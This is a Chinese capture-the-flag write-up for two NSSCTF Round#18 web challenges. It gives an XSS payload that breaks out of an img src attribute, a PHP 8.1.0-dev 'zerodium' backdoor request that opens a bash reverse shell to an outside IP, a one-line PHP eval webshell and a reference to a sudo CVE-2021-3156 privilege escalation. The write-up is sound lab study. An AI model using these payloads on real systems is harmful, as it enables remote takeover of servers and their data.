【Web】NSSCTF Round#18 Basic个人wp(部分)

目录

①门酱想玩什么呢?

②Becomeroot


①门酱想玩什么呢?

先试一下随便给个链接

不能访问远程链接,结合评论区功能,不难联想到xss,只要给个评论区链接让门酱访问就可

我们研究下评论区

从评论区知道,要让门酱玩元梦之星,考虑直接

<script>document.location="https://ymzx.qq.com/";</script>

尝试传了发现不能起作用跳转,估计是<>这些被html实体化了

那咋整呢,题目里还提供了评论插入图片功能

我们就按示例传一下(必须以http://开头,否则不能解析为图片)

链接是插入到了src中,我们可以直接用">闭合img标签

评论传

http://"><script>document.location="https://ymzx.qq.com/";</script>.png 123 /png

成功重定向到元梦之星官网

bp抓包

获得该条恶意评论链接

http://node1.anna.nssctf.cn:28834/words/?title=MQ%3D%3D&content=aHR0cCUzQSUyRiUyRiUyMiUzRSUzQ3NjcmlwdCUzRWRvY3VtZW50LmxvY2F0aW9uJTNEJTIyaHR0cHMlM0ElMkYlMkZ5bXp4LnFxLmNvbSUyRiUyMiUzQiUzQyUyRnNjcmlwdCUzRS5wbmclMjAxMjMlMjAlMkZwbmc%3D

把这个链接给门酱即可获得flag

②Becomeroot

进来直接告诉我们php版本是8.1.0-dev

PHP-8.1.0-dev 后门命令执行漏洞复现_php/8.1.0-dev-CSDN博客

User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/124.222.136.33/1337 0>&1'");

直接反弹shell,发现要提权

GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令

脚本不太好整到靶机上,还是写马连webshell方便点

User-Agentt: zerodiumsystem("echo '<?php eval(\$_POST[1])?>'>/var/www/html/1.php");

尝试用suid提权插件来整,失败

GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令 脚本传到服务器

提权执行命令(环境没了,借了别的师傅的图)

相关推荐
黑客Ash4 小时前
【D01】网络安全概论
网络·安全·web安全·php
.Ayang6 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang6 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
网络安全-老纪6 小时前
iOS应用网络安全之HTTPS
web安全·ios·https
Mr.Pascal7 小时前
刚学php序列化/反序列化遇到的坑(攻防世界:Web_php_unserialize)
开发语言·安全·web安全·php
dot.Net安全矩阵9 小时前
.NET 通过模块和驱动收集本地EDR的工具
windows·安全·web安全·.net·交互
Hacker_Oldv10 小时前
网络安全的学习路线
学习·安全·web安全
黑客Ash10 小时前
计算机中的网络安全
网络·安全·web安全
恃宠而骄的佩奇10 小时前
i春秋-签到题
web安全·网络安全·蓝桥杯